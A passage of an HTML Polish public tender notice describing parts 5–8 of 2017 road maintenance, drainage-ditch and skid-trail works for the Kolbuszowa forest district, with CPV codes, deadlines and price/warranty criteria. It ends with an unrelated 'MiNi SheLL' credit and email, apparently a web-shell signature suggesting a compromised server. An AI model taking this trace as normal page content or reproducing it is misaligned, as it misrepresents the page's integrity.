                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Roboty ziemne przygotowawcze.
2. Wykonanie zjazdów do składu drewna 2 zjazdy.
3. Podbudowa zjazdu wraz z zjazdami do drogi leśnej.
4. Nawierzchnia tłuczniowa składu.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233220-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>przedłużenie minimalnego okresu gwarancji jakości dla przedmiotu zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Utrzymanie dróg w Nadleśnictwie Kolbuszowa 2017 rok <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie dróg w Nadleśnictwie Kolbuszowa 2017 rok
6.1. Naprawa wyboi do 5 cm
6.2. Naprawa wyboi do 10cm
6.3. Naprawa wyboi do 20cm
6.4. Naprawa podbudowy od 15cm do 20cm
6.5. Odtworzenie przepustów
6.6. Odmulenie rowów przydrożnych
6.7. Wykaszanie poboczy drogowych.

Formularz cenowy  utrzymanie dróg, wraz z wyszczególnieniem prac do wykonania.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233220-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>przedłużenie minimalnego okresu gwarancji jakości dla przedmiotu zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Odmulenie konserwacja rowów melioracyjnych w Nadleśnictwie Kolbuszowa 2017 rok<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>7Odmulenie konserwacja rowów melioracyjnych w Nadleśnictwie Kolbuszowa 2017 rok
7.1. Odmulenie i konserwacja rowów mel. przy śr. głębokości 0,8m, szer. dna 0,4m, szer. górą 1,8
7.2. Odtworzenie istniejących przepustów z rur PCV nośności SN 8 śr. 0,6m, L-6mb
7.3. Odtworzenie istniejących przepustów z rur PCV nośności SN 8 śr. 0,6m, L-8mb
7.4. Praca sprzętem  melioracje wodne.

Formularz cenowy  odmulenie i konserwacja rowów, wraz z wyszczególnieniem prac.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45232451-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>przedłużenie minimalnego okresu gwarancji jakości dla przedmiotu zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Wykonanie szlaków zrywkowych w Nadleśnictwie Kolbuszowa 2017 rok<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie szlaków zrywkowych w Nadleśnictwie Kolbuszowa 2017 rok
8.1. Mechaniczne karczowanie pni (śr. 10-15 cm)
8.2. Mechaniczne karczowanie pni (śr. 16-25 cm)
8.3. Mechaniczne karczowanie pni (śr. 26-35 cm)
8.4. Usunięcie warstwy ziemi urodzajnej (humusu) o grubości do 15 cm za pomocą spycharek
8.5. Wykopy oraz przekopy wykonywane koparkami przedsiębiernymi 0.40 m3 na odkład w gruncie kat.I-II , rowy przy szlakach odkład na trasę szlaku
8.6. Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV
8.7. Warstwy odsączające wykonane i zagęszczane mechanicznie o gr.20 cm (30cm) z żwiru lub piasku łamanego umożliwiające zagęszczenie
8.8. Nawierzchnia z tłucznia kamiennego od 0 do 32,5mm - warstwa dolna z tłucznia - grubość po zagęszczeniu 10 cm.

Formularz cenowy  odmulenie i konserwacja rowów, wraz z wyszczególnieniem prac.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233220-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>przedłużenie minimalnego okresu gwarancji jakości dla przedmiotu zamówienia</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com